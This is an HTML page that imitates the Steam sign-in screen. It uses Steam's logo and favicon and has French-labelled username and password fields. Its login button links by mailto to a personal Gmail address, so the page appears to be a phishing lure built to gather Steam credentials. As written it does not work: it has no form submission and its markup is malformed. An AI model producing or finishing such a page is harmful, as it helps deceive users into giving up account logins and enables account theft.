<!DOCTYPE html>
<html>
	<meta charset="UTF-8">
	<title>Steam</title>
    <head>
		<link rel="shortcut icon" href="https://store.steampowered.com/favicon.ico" type="image/x-icon">
    </head>
  <center>
<img src="https://steamstore-a.akamaihd.net/public/shared/images/header/globalheader_logo.png?t=962016" class=steamLogo>
<body style = "background-color: #171a21;"></body>

<strong>
    <big>
        <big>
    <span class=connectInfo style="font-family:sans-serif">CONNEXION</span>
     </big>
    </big>
</strong>
      <input class=username_input id="username" type="username" name="username" id="input_username" value="" placeholder="Pseudo">
	<input class=password_input id="password" type="password" name="password" id="input_password" value="" placeholder="Mot de passe">
	<button href="mailto:remi.dupont0312@gmail.com" class=buttonStart id="button1" type="button" name="button">Connexion</button>
</center>

<style type="text/css">

.steamLogo {
	position: relative;
	right: 370px;
	top: 50px;
}

.connectInfo {
    color: #fff;
    position: relative;
	display: block;
  	margin-left: auto;
  	margin-right: auto;
}

.username_input {
	position: relative;
	background-color: rgba( 0, 0, 0, 0.2 );
	color: #fff;
    border: 1px solid #000;
	border-radius: 3px;
	box-shadow: 1px 1px 0px #45556c;
	width: 300px;
	height: 15px;
	padding: 10px;
	margin: 4px 0;
	top: 50px;
	display: block;
  	margin-left: auto;
  	margin-right: auto;
}

.password_input {
	position: relative;
	background-color: rgba( 0, 0, 0, 0.2 );
	color: #fff;
	border: 1px solid #000;
	border-radius: 3px;
	box-shadow: 1px 1px 0px #45556c;
	width: 300px;
	height: 15px;
	padding: 10px;
	margin: 4px 0;
	top: 100px;
	display: block;
  	margin-left: auto;
  	margin-right: auto;
}

.buttonStart {
	position: relative;
	background-color: rgba( 0, 0, 0, 0.2 );
	color: #fff;
	border: 1px solid #000;
	border-radius: 3px;
	box-shadow: 1px 1px 0px #45556c;
	padding: 10px;
	margin: 4px 0;
	top: 150px;
	width: 150px;
	font-size: 16px;
	display: block;
  	margin-left: auto;
 	margin-right: auto;
}

   </style>
<body>
   </body>
</html>